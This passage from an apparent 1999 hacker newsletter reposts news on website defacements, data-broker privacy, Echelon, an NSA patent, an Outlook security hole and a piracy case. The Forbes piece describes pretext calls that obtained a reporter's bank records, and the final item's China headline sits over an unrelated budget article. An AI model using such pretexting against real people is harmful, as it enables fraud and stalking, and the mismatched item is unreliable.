      the matter would have to wait until "first thing Monday morning."

      "The homepage is for general information," said Leung. "If it's down for 
      one or two days, it will not be a big impact on the public." 

      However, the site had been repaired within two hours of Leung's comments.

      The Highways Department was not the only official body ignoring online 
      vandalism. On Thursday, a hacker broke into the Chinese Ministry of 
      Foreign Affairs Website, at http://fmprc.gov.cn/ , and replaced its home 
      page with several lines of hacker boasts and obscenities. The 
      defaced site was still online over the weekend. 

      A day later, on Friday, a Chinese court jailed a hacker for three years 
      for breaking into the computer system of the Shanghai branch of a Hainan 
      securities company and manipulating prices. The former employee of trust 
      firm Shijiazhuang Trust and Investment, Zhao Zhe, 28, was found 
      guilty of changing stock data so he could profit from two share sales at 
      artificially inflated prices.

      Meanwhile, officials in Singapore have been taking the issue very 
      seriously. At least two Singapore government Websites were hacked and Web 
      pages altered last week, causing the sites to be taken offline and 
      investigators called in. 

      The Singapore Government Shopfront, at http://shop.gov.sg , was broken 
      into on Friday, and the Ministry of Law's Integrated Land Information 
      Service (INLIS) Web site, at http://www.inlis.gov.sg , was hacked into 
      last Tuesday. 

      Both sites were quickly taken offline for official investigations. 
      Officials said that no records or data were compromised. The Singapore 
      Computer Response Team (SingCERT) is assisting in the investigations and 
      the Police have been notified. 

      "The Ministry of Law takes a serious view of this, as hacking is a serious 
      offense punishable with heavy penalties," said the ministry, in a 
      statement. 

      In September, a fifteen year old Singapore boy was sentenced to a year's 
      probation and 100 hours community service for hacking into the Television 
      Corporation of Singapore's Website, at http://www.tcs.com.sg , earlier 
      this year. Although the attack took place in June, another TCS Website 
      was hacked shortly after, causing government officials to inform the 
      public that they would not hesitate to punish such offences. 
      
      @HWA
      
20.0  You Have No Privacy Anyway 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Adam 
      Forbes Magazine hired a private eye to gather all the
      information he could on one of their reporters. For less
      than $500 he legally came up with all of the reporter's
      financial information, unlisted phone numbers, social
      security number, etc... very terrifying. If you have been
      wondering what all this privacy hype is about then read
      this. 

      Forbes        
      http://www.forbes.com/Forbes/99/1129/6413182a.htm
      
      
      Our reporter dared a private eye to dig up
      dirt on him. The results are terrifying to
      anybody who worries about prying eyes or
      credit card scamsters. What can you do to
      protect yourself? 

      The End of Privacy 

      By Adam L. Penenberg 


      THE PHONE RANG AND A STRANGER CRACKED SING-SONGY AT THE OTHER END OF the 
      line: "Happy Birthday." That was spooky--the next day I would turn 37. 
      "Your full name is Adam Landis Penenberg," the caller continued. "Landis?" 
      My mother's maiden name. "I'm touched," he said. Then Daniel Cohn, Web 
      detective, reeled off the rest of my "base identifiers"--my birth date, 
      address in New York, Social Security number. Just two days earlier I had 
      issued Cohn a challenge: Starting with my byline, dig up as much 
      information about me as you can. "That didn't take long," I said. 

      "It took about five minutes," Cohn said, cackling back in Boca Raton, Fla. 
      "I'll have the rest within a week." And the line went dead. 

      In all of six days Dan Cohn and his Web detective agency, Docusearch.com, 
      shattered every notion I had about privacy in this country (or whatever 
      remains of it). Using only a keyboard and the phone, he was able to 
      uncover the innermost details of my life--whom I call late at night; how 
      much money I have in the bank; my salary and rent. He even got my unlisted 
      phone numbers, both of them. Okay, so you've heard it before: America, the 
      country that made "right to privacy" a credo, has lost its privacy to the 
      computer. But it's far worse than you think. Advances in smart 
      data-sifting techniques and the rise of massive databases have conspired 
      to strip you naked. The spread of the Web is the final step. It will make 
      most of the secrets you have more instantly available than ever before, 
      ready to reveal themselves in a few taps on the keyboard. 

      For decades this information rested in remote mainframes that were 
      difficult to access, even for the techies who put it there. The move to 
      desktop PCs and local servers in the 1990s has distributed these data far 
      and wide. Computers now hold half a billion bank accounts, half a billion 
      credit card accounts, hundreds of millions of mortgages and retirement 
      funds and medical claims and more. The Web seamlessly links it all 
      together. As e-commerce grows, marketers and busybodies will crack open a 
      cache of new consumer data more revealing than ever before (see box, p. 
      188). 

      It will be a salesman's dream--and a paranoid's nightmare. Adding to the 
      paranoia: Hundreds of data sleuths like Dan Cohn of Docusearch have opened 
      up shop on the Web to sell precious pieces of these data. Some are 
      ethical; some aren't. They mine celebrity secrets, spy on business rivals 
      and track down hidden assets, secret lovers and deadbeat dads. They 
      include Strategic Data Service (at datahawk.com) and Infoseekers.com and 
      Dig Dirt Inc. (both at the PI Mall, www.pimall.com). 

      Cohn's firm will get a client your unlisted number for $49, your Social 
      Security number for $49 and your bank balances for $45. Your driving 
      record goes for $35; tracing a cell phone number costs $84. Cohn will even 
      tell someone what stocks, bonds and securities you own (for $209). As with 
      computers, the price of information has plunged. 

      You may well ask: What's the big deal? We consumers are as much to blame 
      as marketers for all these loose data. At every turn we have willingly 
      given up a layer of privacy in exchange for convenience; it is why we use 
      a credit card to shop, enduring a barrage of junk mail. Why should we care 
      if our personal information isn't so personal anymore? 

      Well, take this test: Next time you are at a party, tell a stranger your 
      salary, checking account balance, mortgage payment and Social Security 
      number. If this makes you uneasy, you have your answer. 

      "If the post office said we have to use transparent envelopes, people 
      would go crazy, because the fact is we all have something to hide," says 
      Edward Wade, a privacy advocate who wrote Identity Theft: The Cybercrime 
      of the Millennium (Loompanics Unlimited, 1999) under the pseudonym John Q. 
      Newman. 

      You can do a few things about it (see box, p. 186). Give your 
      business to the companies that take extra steps to safeguard your data and 
      will guarantee it. Refuse to reveal your Social Security number--the key 
      for decrypting your privacy--to all but the financial institutions 
      required by law to record it. 

      Do something, because many banks, brokerages, credit card issuers and 
      others are lax, even careless, about locking away your records. They take 
      varied steps in trying to protect your privacy (see box, p. 187). Some 
      sell information to other marketers, and many let hundreds of employees 
      access your data. Some workers, aiming to please, blithely hand out your 
      account number, balance and more whenever someone calls and asks for it. 
      That's how Cohn pierced my privacy. 

      "You call up a company and make it seem like you're a spy on a covert 
      mission, and only they can help you," he says. "It works every time. All 
      day long I deal with spy wannabes." 

      I'm not the paranoid type; I don't see a huddle on TV and think that 11 
      football players are talking about me. But things have gone too far. A 
      stalker would kill for the wealth of information Cohn was able to dig up. 
      A crook could parlay the data into credit card scams and "identity theft," 
      pilfering my good credit rating and using it to pull more ripoffs. 

      Cohn operates in this netherworld of private eyes, ex-spooks and ex-cops, 
      retired military men, accountants and research librarians. Now 39, he grew 
      up in the Philadelphia suburb of Bryn Mawr, attended Penn State and joined 
      the Navy in 1980 for a three-year stint. In 1987 Cohn formed his own 
      agency to investigate insurance fraud and set up shop in Florida. "There 
      was no shortage of work," he says. He invented a "video periscope" that 
      could rise up through the roof of a van to record a target's scam. 

      In 1995 he founded Docusearch with childhood pal Kenneth Zeiss. They fill 
      up to 100 orders a day on the Web, and expect $1 million in business this 
      year. Their clients include lawyers, insurers, private eyes; the Los 
      Angeles Pension Union is a customer, and Citibank's legal recovery 
      department uses Docusearch to find debtors on the run.

      Cohn, Zeiss and 13 researchers (6 of them licensed P.I.s) work out of the 
      top floor of a dull, five-story office building in Boca Raton, Fla., 
      sitting in cubicles under a fluorescent glare and taking orders from 9 
      a.m. to 4 p.m. Their Web site is open 24 hours a day, 365 days a year. You 
      click through it and load up an on-line shopping cart as casually as if 
      you were at Amazon.com. 

      The researchers use sharp sifting methods, but Cohn also admits to 
      misrepresenting who he is and what he is after. He says the law lets 
      licensed investigators use such tricks as "pretext calling," fooling 
      company employees into divulging customer data over the phone (legal in 
      all but a few states). He even claims to have a government source who 
      provides unpublished numbers for a fee, "and you'll never figure out how 
      he is paid because there's no paper trail." 

      Yet Cohn claims to be more scrupulous than rivals. "Unlike an information 
      broker, I won't break the law. I turn down jobs, like if a jealous 
      boyfriend wants to find out where his ex is living." He also says he won't 
      resell the information to anyone else. 

      Let's hope not. Cohn's first step into my digital domain was to plug 
      my name into the credit bureaus--Transunion, Equifax, Experian. In minutes 
      he had my Social Security number, address and birth date. Credit agencies 
      are supposed to ensure that their subscribers (retailers, auto dealers, 
      banks, mortgage companies) have a legitimate need to check credit. 

      "We physically visit applicants to make sure they live up to our service 
      agreement," says David Mooney of Equifax, which keeps records on 200 
      million Americans and shares them with 114,000 clients. He says resellers 
      of the data must do the same. "It's rare that anyone abuses the system." 
      But Cohn says he gets his data from a reseller, and no one has ever 
      checked up on him. 

      Armed with my credit header, Dan Cohn tapped other sites. A week after my 
      birthday, true to his word, he faxed me a three-page summary of my life. 
      He had pulled up my utility bills, my two unlisted phone numbers and my 
      finances. 

      This gave him the ability to map my routines, if he had chosen to do so: 
      how much cash I burn in a week ($400), how much I deposit twice a month 
      ($3,061), my favorite neighborhood bistro (the Flea Market Cafe), the $720 
      monthly checks I write out to one Judith Pekowsky: my psychotherapist. 
      (When you live in New York, you see a shrink; it's the law.) If I had an 
      incurable disease, Cohn could probably find that out, too. 

      He had my latest phone bill ($108) and a list of long distance calls made 
      from home--including late-night fiber-optic dalliances (which soon ended) 
      with a woman who traveled a lot. Cohn also divined the phone numbers of a 
      few of my sources, underground computer hackers who aren't wanted by the 
      police--but probably should be. 

      Knowing my Social Security number and other personal details helped Cohn 
      get access to a Federal Reserve database that told him where I had 
      deposits. Cohn found accounts I had forgotten long ago: $503 at Apple Bank 
      for Savings in an account held by a long-ago landlord as a security 
      deposit; $7 in a dormant savings account at Chase Manhattan Bank; $1,000 
      in another Chase account. 

      A few days later Cohn struck the mother lode. He located my cash 
      management account, opened a few months earlier at Merrill Lynch & Co. That 
      gave him a peek at my balance, direct deposits from work, withdrawals, ATM 
      visits, check numbers with dates and amounts, and the name of my broker. 

      That's too much for some privacy hawks. "If someone can call your bank and 
      get them to release account information without your consent, it means you 
      have no privacy," says Russell Smith, director of Consumer.net in 
      Alexandria, Va., who has won more than $40,000 suing telemarketers for 
      bothering him. "The two issues are knowledge and control: You should know 
      what information about you is out there, and you should be able to control 
      who gets it." 

      How did Cohn get hold of my Merrill Lynch secrets? Directly from the 
      source. Cohn says he phoned Merrill Lynch and talked to one of 500 
      employees who can tap into my data. "Hi, I'm Dan Cohn, a licensed state 
      investigator conducting an investigation of an Adam Penenberg," he told 
      the staffer, knowing the words "licensed" and "state" make it sound like 
      he works for law enforcement. 
      
      
      @HWA
      
21.0  ACLU to Monitor Echelon 
      ~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by turtlex 
      The American Civil Liberties Union in cooperation with
      the Electronic Privacy Information Center and others
      has started a program to monitor Echelon. The groups
      hope to pressure congress for an investigation into the
      global eavesdropping network. (For something that
      supposedly doesn't exist - Echelon sure gets a lot of
      press.) 

      Wired
      http://www.wired.com/news/politics/0,1283,32586,00.html
      
      ACLU
      http://www.aclu.org
      
      EPIC
      http://www.epic.org
      
      Echelon Watch      
      http://www.echelonwatch.org
      
      Wired;
      
      ACLU to Spy on Echelon 
      by Chris Oakes 
      
      3:00 a.m. 17.Nov.1999 PST 
      The American Civil Liberties Union has focused its eye on an international 
      electronic surveillance system that allegedly eyeballs regular citizens. 

      The civil liberties watchdog launched Echelon Watch, a site designed to 
      prompt governmental investigation into the reality -- and the legalities 
      -- of a global electronic surveillance system said to be code-named 
      "Echelon." 

      "This has gone from X Files material to clear reality," said ACLU 
      associate director Barry Steinhardt. "I think at this point it's fact that 
      it exists." 

      The ACLU created and administers the site in conjunction with the 
      Electronic Privacy Information Center and the Omega Foundation of Great 
      Britain, which prepared a report on the issue to the European Parliament. 

      No US intelligence agency has confirmed Echelon, but Steinhardt believes 
      there is sufficient evidence to require a congressional investigation. 

      "I admit that we do not know all the details," Steinhardt said. "But based 
      on these credible reports, it is plainly very large, and very 
      sophisticated." 

      The ACLU bases its position mainly on two reports commissioned by the 
      European Parliament and a letter written by an Australian intelligence 
      official, which confirmed aspects of an Echelon-like operation involving 
      the United Kingdom, the United States, and Australia. 

      According to reports such as those solicited by the European Parliament, 
      Echelon is led by the National Security Agency in the United States, in 
      conjunction with its counterpart agencies in England, Canada, Australia, 
      and New Zealand. 

      Such reports paint a picture of an internationally coordinated 
      surveillance system that intercepts and analyzes global land-based and 
      space-based communications networks, such as the Internet. Monitoring 
      operations run by intelligence agencies worldwide are said to catch 
      everyday telephone, data, cellular, fax, and email transmissions. The 
      transmissions are then purportedly analyzed for suspect activity -- such 
      as terrorism -- and handed off to the appropriate government. 

 ->  *By coordinating across national boundaries, governments can monitor each 
 ->  *other's traffic and circumvent laws prohibiting governments from spying on 
 ->  *their own citizens. Echelon reportedly attempts to capture satellite, 
      microwave, cellular, and fiber-optic communications. The latest in a 
      trickle of what are often merely suggestions of Echelon-like operations is 
      a patent issued by the US Patent and Trademark Office to the US National 
      Security Agency in August for voice-recognition technology. Steinhardt 
      pointed out that the technology is designed to summarize voice 
      communications for further examination. 

      Such technology sounds Echelon-ish -- but then again, it was issued to an 
      intelligence-gathering agency. 

      That's partly why the ACLU wants to see the issue taken beyond disparate 
      reports, theories, and rumors. 

      "Echelon operates inside this black box -- without judicial supervision, 
      without public notice," Steinhardt said. "At this point what the ACLU is 
      asking for is full disclosure of the laws under which Echelon operates -- 
      something the NSA has refused to provide, even to Congress." 

      The report to the European Parliament said that the United Kingdom used 
      the Echelon system to spy on charities, including Amnesty International 
      and Christian Aid. 

      The United States has never officially acknowledged Echelon's existence. 
      When approached to discuss Echelon-related developments, the National 
      Security Agency repeatedly declines comment. 

      Representative Bob Barr (R-Georgia) earlier this year amended intelligence 
      legislation in the House of Representatives to require US intelligence 
      agencies to report on legal standards used in surveillance activities. 

      The legislation -- which targets the National Security Agency, the Central 
      Intelligence Agency, and the Department of Justice -- remains in a 
      House-Senate conference committee awaiting action. 

      Barr is a former CIA official and US attorney who serves on the House 
      Judiciary and Government Reform committees. He has accused the NSA of 
      conducting a "dragnet" of communication and "invading the privacy of 
      American citizens."

      Documents posted at Echelon Watch include the fax image of a letter sent 
      to an Australian journalist from the Office of the Director of the 
      Australian Defence Signals Directorate (DSD), Martin Brady. 

      The operating rules of the Australian agency "do provide mechanisms to 
      permit DSD to monitor and report foreign communications involving 
      Australians in some special carefully-defined circumstances," the letter 
      said. "DSD does cooperate with counterpart signals intelligence 
      organizations overseas under the UK-USA relationship." 

      In addition to a collection of such documents related to Echelon, the new 
      ACLU site will leverage the group's existing site traffic to encourage 
      public discussion of Echelon's impact on civil liberties. It features 
      links prompting visitors to urge an investigation to Congress. 

      "I think it's beginning to be taken seriously in Washington," Steinhardt 
      said. "It's certainly being taken seriously in other parts of the world. I 
      think the hearings will be the likely next step." 
      
      @HWA
      
22.0  NSA Gets Patent on Analyzing Speech 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      The National Security Agency has recently been
      awarded a patent for a system of automatic topic
      spotting and labeling of data. This could assist the
      agency in automatically analyzing human speech. 

      The London Independent
      http://www.independent.co.uk/news/Digital/Features/spies151199.shtml
      
           
      US PTO       
      http://164.195.100.11/netacgi/nph-Parser?Sect1=PTO1&Sect2=HITOFF&d=PALL&p=1&u=/netahtml/srchnum.htm&r=1&f=G&l=50&s1='5,937,422'.WKU.&OS=PN/5,937,422&RS=PN/5,937,422
      
      London Independent;
      
      This is just between us (and the spies) 

      The US National Security Agency has patented a
      new technology for monitoring millions of
      telephone calls, so watch out, it's now even
      easier for the spooks to eavesdrop on your
      conversations 

      By Suelette Dreyfus 

      15 November 1999 

      The US National Security Agency has designed and patented a new
      technology that could aid it in spying on international telephone calls.
      The NSA patent, granted on 10 August, is for a system of automatic
      topic spotting and labelling of data. The patent officially confirms for the
      first time that the NSA has been working on ways of automatically
      analysing human speech. 

      The NSA's invention is intended automatically to sift through human
      speech transcripts in any language. The patent document specifically
      mentions "machine-transcribed speech" as a potential source. 

      Bruce Schneier, author of Applied Cryptography, a textbook on the
      science of keeping information secret, believes the NSA currently has
      the ability to use computers to transcribe voice conversations. 

      "One of the holy grails of the NSA is the ability automatically to search
      through voice traffic. They would have expended considerable effort
      on this capability, and this indicates it has been fruitful," he said. 

      To date, it has been widely believed that while the NSA has the
      capability to conduct fully automated, mass electronic eavesdropping
      on e-mail, faxes and other written communications, it cannot do so on
      telephone calls. 

      While cautioning that it was difficult to tell how well the ideas in the
      patent worked in practice, Schneier said the technology could have
      far-reaching effects on the privacy of international phone calls. 

      "If it works well, the technology makes it possible for the NSA to
      harvest millions of telephone calls, looking for certain types of
      conversations," he said. 

      "It's easy to eavesdrop on any single phone call, but sifting through
      millions of phone calls looking for a particular conversation is difficult,"
      Schneier explained. "In terms of automatic surveillance, text is easier to
      search than speech. This patent brings the surveillance of speech
      closer to that of text." 

      The NSA declined to comment on the patent. As a general policy, the
      agency never comments on its intelligence activities. 

      Yaman Akdeniz, director of Cyber-Rights & Cyber-Liberties UK,
      warned that with the new patent and a proposed AT&T and BT joint
      venture, which will allow US law enforcement agencies to tap the new
      communications network: "We might have a picture in which all British
      communications are monitored by the NSA." 

      The revelation of the NSA's patent is likely to cause tensions with the
      European Parliament. Over the past two years, the Parliament has
      commissioned several reports which examined whether the NSA has
      been using its electronic ears for commercial espionage, particularly in
      areas where US corporations compete with European and other
      companies. 

      The NSA relies on an international web of eavesdropping stations
      around the world, commonly known as Echelon, to listen into private
      international communications. The network emerged from a secret
      agreement signed after the Second World War between five nations
      including Australia, New Zealand, Canada, Britain and the US. Two of
      the NSA's most important satellite listening stations are located in
      Europe, at Menwith Hill in Yorkshire and Bad Aibling in Germany. 

      Julian Assange, a cryptographer who moderates the online Australian
      discussion forum AUCRYPTO, found the new patent while
      investigating NSA capabilities. 

      "This patent should worry people. Everyone's overseas phone calls
      are or may soon be tapped, transcribed and archived in the bowels of
      an unaccountable foreign spy agency," he said. 

      One of the major barriers to using computers automatically to sift
      through voice communications on a large scale has been the inability of
      machines to "think" like humans when analysing the often imperfect
      computer transcriptions of voice conversations. 

      Commercial software that enables computers to transcribe spoken
      words into typed text is already on the market, but it usually requires
      the machine to spend time learning how to understand an individual
      voice in order to produce relatively error-free text. This makes such
      software impractical for a spy agency which might want automatically
      to transcribe and analyse telephone calls on a large scale. 

      It is also difficult for computers to analyse voice conversations
      because human speech often covers topics that are never actually
      spoken by name. According to the NSA patent application, "much of the
      information conveyed in speech is never actually spoken and...
      utterances are frequently less coherent than written language". 

      US Patent number 5,937,422 reveals that the NSA has designed
      technology to overcome these barriers in two key ways. First, the
      patent includes an optional pre-processing step which cleans up text,
      much of which the agency appears to expect to draw from human
      conversations. The NSA's "pre-processing" will remove what it calls
      "stutter phrases" associated with speech based on text. 

      Second, the patent uses a method by which a computer automatically
      assigns a label, or topic description, to raw data. If the method works
      well, this system could be far more powerful than traditional keyword
      searching used on many Internet search engines because it could pull
      up documents based on their meaning, not just their keywords. 

      Dr Brian Gladman, former MoD director of Strategic Electronic
      Communications, said that while he doubted the NSA had deployed the
      patented system yet, the new technology could become a "potent
      future threat" to privacy. 

      "If the technology does what it says -- automatically finding and
      extracting the meaning in messages with reasonable accuracy -- then it
      is way ahead of what is being done now," he said. 

      The best way for people to protect their private communications was
      to use encryption, he said. Encryption software programs scramble
      data to prevent eavesdropping. "I'm afraid widespread interception is a
      fact of life and this is what makes encryption so important," he said. 

      "The problem in the UK is that our government is working with the US to
      prevent UK citizens defending themselves using encryption," he said,
      referring to the continuing use of export controls to hamper the
      widespread availability of encryption products. 

      The NSA's current spy technology may be more advanced than
      methods described in the patent because the application is more than
      two years old. The US Patent Office approved the patent on 10 August
      this year, but the NSA originally lodged the application on 15 April 1997.
      The US Patent office keeps all applications secret until it issues a
      patent. 
      
      @HWA
      
23.0  New Ezine and Web Site - PrivacyPlace Launches 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      An online magazine, with news about privacy issues
      updated on a daily basis, PrivacyPlace includes opinions,
      advice, a forum for readers, an archive of articles on
      privacy, and a marketplace that recommends products
      and services available for protecting privacy. Future
      content includes product and book reviews, a
      developer's corner, and guides to encrypting e-mail and
      surfing the web anonymously. 

      PrivacyPlace
      http://www.privacyplace.com
      
      Excite News       
      http://news.excite.com/news/bw/991112/ca-lumeria
      
      'PrivacyPlace,' the Online Magazine for Personal Privacy, Launches First
      Issue; PrivacyPlace.com Offers News, Opinion, Advice, Community and
      Technology for Protecting Personal Privacy
                                                                         
                                           Updated 6:03 AM ET November 12, 1999
    
      BERKELEY, Calif. (BUSINESS WIRE) - PrivacyPlace, a new site designed to 
      offer individuals ways to protect their personal privacy, is now online at 
      www.privacyplace.com.

      An online magazine, with news about privacy issues updated on a daily 
      basis, PrivacyPlace includes opinions, advice, a forum for readers, an 
      archive of articles on privacy, and a marketplace that recommends products 
      and services available for protecting privacy. Future content 
      includes product and book reviews, a developer's corner, and guides to 
      encrypting e-mail and surfing the web anonymously.

      PrivacyPlace.com is an effort to give people the tools, the information, 
      and ideas on ways to protect their privacy.

      PrivacyPlace Editor Tom Maddox is a science fiction writer, screenplay 
      writer (he has written two X Files scripts with coauthor William Gibson), 
      journalist, and essayist.

      Maddox says PrivacyPlace aims to combine the creativity of a talented team 
      of writers with the power of the Internet to create a publication that is 
      lively, funny, insightful, and ultimately useful for anyone concerned with       
      personal privacy. His credo: "We believe in the power of each of us to 
      fight in our own lives for our privacy and in the social power of 
      concerted action."

      Regular columnists for PrivacyPlace include Mike Godwin, former legal 
      counsel for the Electronic Frontier Foundation, and Jacques Francoeur, CEO 
      of The Privacy Gateway and expert in international privacy issues. In the 
      first issue, special contributor George Smith, editor of Crypt News 
      and longtime debunker of government myths about cryptography, writes about 
      the Moonlight Maze -- the Russian infowar attack that never was.

      A regular feature includes the Nosy Parker Award, which is presented to 
      those who have egregiously trampled on personal privacy, and a regular 
      column from an anonymous character known as Paranoid Paul, who issues a       
      report from the road.

      The Marketplace offers privacy-related software programs users can 
      purchase for immediate download. There's also an ever-growing library of 
      past articles on privacy, indexed by subject, and a Forum, where readers 
      can talk with each other, with writers at PrivacyPlace, and with the 
      editors.

      PrivacyPlace is owned and operated by Lumeria Inc, an infomediary 
      incubator. Lumeria was founded in 1997 by former computer journalist and 
      industry analyst Fred Davis to provide technology solutions for the 
      personal management of information and knowledge. Fred Davis is also 
      the Editor-in-Chief of PrivacyPlace.

      The publisher of PrivacyPlace is Colette McMullen, who also serves as 
      Lumeria's VP of Sales and Marketing. Before joining Lumeria, McMullen was 
      Group Publisher of IDG's Web Publishing group -- which includes Sun       
      World, Java World, and Linux World -- where she cofounded the first 
      profitable online publication. 

      Contact: PrivacyPlace Tom Maddox, 510/981-2215 editor@privacyplace.com or 
      Berkeley Ventures, Inc. Sylvia Paull, 510/526-5555 sylvia@weblust.com 
    
      
24.0  Vendor Response Archive 
      ~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by erik 
      Dragonmount Networks, in hoping to expose vendors
      who put security on the back burner, and to salute
      those who make it a priority, has launched the Vendor
      Response Archive. The Vendor Response Archive hopes
      to pressure software vendors to take security seriously.
      If a vendor responds poorly to a problem, users should
      know. Likewise, if a vendor responds quickly and
      honestly, the vendor should be commended. 

      Dragonmount Networks       
      http://www.dragonmount.net/security/vra/index.htm
      
      @HWA
      
25.0  Another from Cuartango: More Microsoft Security Holes 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by no0ne 
      Called the "Active Server Setup Security Loophole", this
      glitch in Microsoft Outlook and Outlook Express can
      download an e-mail attachment without the user's
      knowledge. The attachment has the capability to
      access and delete files at will. 

      MSNBC       
      http://www.msnbc.com/news/335418.asp
                   
      MS bug opens door to your hard drive

                                                                          
      Outlook, Outlook Express save temporary copy of file to disk when
      you open attachment
                                                  
                                                 By Bradley F. Shimmin
                                                                BUGNET

                                                                          

      Nov. 15 -- Forget for now about the BubbleBoy
      Virus, which has yet to cause anyone harm.
      There's a real vulnerability lurking in Microsoft
      Outlook and Outlook Express capable of
      delivering your machine into malevolent hands.
      
      DISCOVERED BY JUAN CARLOS GARCIA
      CUARTANGO, the "Active Setup Control Security
      Loophole" can download and save an e-mail-borne
      attachment without your intervention or knowledge. Once
      free to roam your hard drive, the attachment can access or
      delete files at will.

      (Note: Microsoft is a partner in MSNBC.)

      What makes this vulnerability particularly scary is its
      stealth. A hostile hacker could create an HTML e-mail
      message attachment that masquerades as an innocuous
      Cabinet (CAB) file. This is the file format Microsoft uses to
      transport and store application code such as software
      updates. The trick is that you don't need to save such a
      deceitful file to disk. By simply opening the attachment, both
      e-mail applications save a temporary copy to disk. Code
      embedded in the e-mail message can then execute this copy. 
             

      "A malicious user could embed an unsafe executable
      and disguise it as a safe attachment, so users following
      normal security standards could think they are safe,"
      explained Lisa Gurry, a Microsoft product manager for
      Office. "The danger is someone could exploit it and create a
      CAB that could do who knows what." 
      
      Concerned users can quickly disable Active Scripting in
      Outlook 2000 or Outlook Express as a temporary
      workaround. This will prevent any embedded code from executing a
      malicious CAB file that has already been written to
      disk. Another workaround is to simply save
      attachments to disk before opening them. The
      unfriendly code in an e-mail message must
      execute when the file attachment is opened in order to find
      out where the temporary file has been created. 
      
      To fully quash this bug, Microsoft recommends a
      software patch, which the company has made available from
      its Security Advisor site. But it's not for Outlook or Outlook
      Express. "The vulnerability is in Internet Explorer," said
      Gurry. "It is an ActiveX control that ships as a part of
      Explorer 4 and 5, yet Outlook and Outlook Express users are
      affected by it." 
             

      Microsoft's Active Setup Control Patch 

      The patch fixes a fault within the Active Setup ActiveX
      control found within IE version 4.01 and above running on
      both Intel and Alpha machines. It replaces a file called
      INSENG.DLL with a file of the same name dated
      10/26/1999. The new file requires that all CAB file
      attachments (real or pretend) contain a valid digital signature.
      Of course, a knave could still send a hostile attachment, but
      the file's signature would create a traceable fingerprint. 

      However, the patch only works on versions 4.01 running
      Service Pack 2. If you're running IE 4.01 with Service Pack
      1 (or any earlier version of IE), Microsoft recommends that
      you simply upgrade to a newer version before applying the
      patch.
      
      @HWA
      
26.0  DOD helps Local Cops in Fighting CyberCrime 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      While the Department of Defense may be prohibited from
      conducting local law enforcement they can advise or
      assist local police agencies in other ways such as
      grants, access to support services or systems, and
      transfers of equipment or other assets. The GAO has
      released a report detailing crime technology assistance
      from DOD to local law enforcement agencies. 

      GAO        
      http://www.gao.gov/daybook/991115.htm
      
      (Links to pdf files)
      
27.0  BSA Busts IRC Pirates 
      ~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Evil Wench 
      US Marshals have reportedly seized five computers and
      have executed several search warrants in Sacramento
      and Downey, California, and Troy and West Bloomfield,
      Michigan. The people arrested have been accused of
      using the irc channel 'warez4cable' to trade copyrighted
      software. The accused individuals could face up to
      US$100,000 in fines for copyright infringement. BSA
      claimed that the IRC channel has been shut down
      (seems open right now, just +i) and that this case has
      had a dramatic impact on online piracy. (Dramatic
      impact? One channel out of thousands? Yeah, OK,
      sure.) 

      Wired       
      http://www.wired.com/news/technology/0,1282,32616,00.html
      
      
      Warez Chatters Busted: Piracy 
      by Wired News Report 
      
      3:45 p.m. 17.Nov.1999 PST 
      The Business Software Alliance is pressing charges against 25 people the 
      organization accuses of trafficking pirated software on the Internet. 

      US Marshals reportedly seized five computers and performed unannounced 
      searches in the homes of several of those accused of the pirating, 
      including residents of Sacramento and Downey, California, and Troy and 
      West Bloomfield, Michigan. 

      The accused individuals could face up to US$100,000 in fines for copyright 
      infringement, the BSA said. 

      The individuals were allegedly using a channel on Internet Relay Chat, a 
      real-time chat network commonly used by hackers and crackers to 
      communicate and plan their activities. The channel, called warez4cable, 
      has been shut down, according to the BSA, as well as several other 
      warez channels. 

      Warez refers to software that has been stripped of its copy-protection and 
      made available on the Internet for downloading. 

      The BSA said in a statement that the action against the warez users is 
      part of an initiative to "shut down illegal trafficking of software on the 
      Internet." 

      "We have seen an immediate impact on piracy in IRC channels as a result of 
      the lawsuit," BSA enforcement official Bob Kruger said. "BSA will continue 
      to fight piracy on the Internet to keep it a safe place for those who are 
      engaging in legitimate commerce." 
      
      @HWA
      
28.0  US Concerned About Chinese Statements 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by William Knowles 
      Recent posturing by the Chinese government about
      information warfare has the US worried. The People's
      Liberation Army has announced that it will gear up its
      information warfare capabilities to rival that of its land,
      sea and air forces. Vice Adm. Thomas Wilson, the new
      director of the Defense Intelligence Agency (DIA) has
      called the Chinese plans and their open discussion of
      them unsettling. (Let the arms race begin.) 

      Washington Times       
      http://www.washingtontimes.com/news/news3.html
      
      House OKs budget of $384 billion for '00
 
      By Dave Boyer
      THE WASHINGTON TIMES
 
          The 106th Congress is wrapping up its first session with
          Republican lawmakers trumpeting admittedly modest
          spending achievements and Democrats bemoaning lost
      opportunities for new regulations.
           The House Thursday passed, 296-135, the final $384 billion
      spending bill for fiscal 2000, while the Senate cleared the way
      for a vote Friday. The measure calls for a 0.38 percent
      across-the-board cut -- not including congressional salaries and
      government entitlements.
           House Speaker J. Dennis Hastert of Illinois, who worked
      until 3:30 a.m. Thursday to complete the budget, said
      Republicans can be proud of balancing the budget, saving Social
      Security funds, increasing spending for education and defense
      and passing a tax cut that 
      President Clinton vetoed.
           "We did all of the things we set out to do," Mr. Hastert said.
      "We've done the things that the American people wanted us to
      do."
           House Minority Leader Richard A. Gephardt of Missouri
      said Congress accomplished little of importance. Mr. Gephardt
      expressed disappointment that Congress did not ban "soft
      money" in political campaigns, failed to pass gun regulations or a
      minimum-wage increase, and did not enact a new benefit for
      prescription drugs.
           (Soft money is unlimited and largely unregulated donations.)
           "We're leaving here without doing the things that people most
      wanted us to do," Mr. Gephardt said.
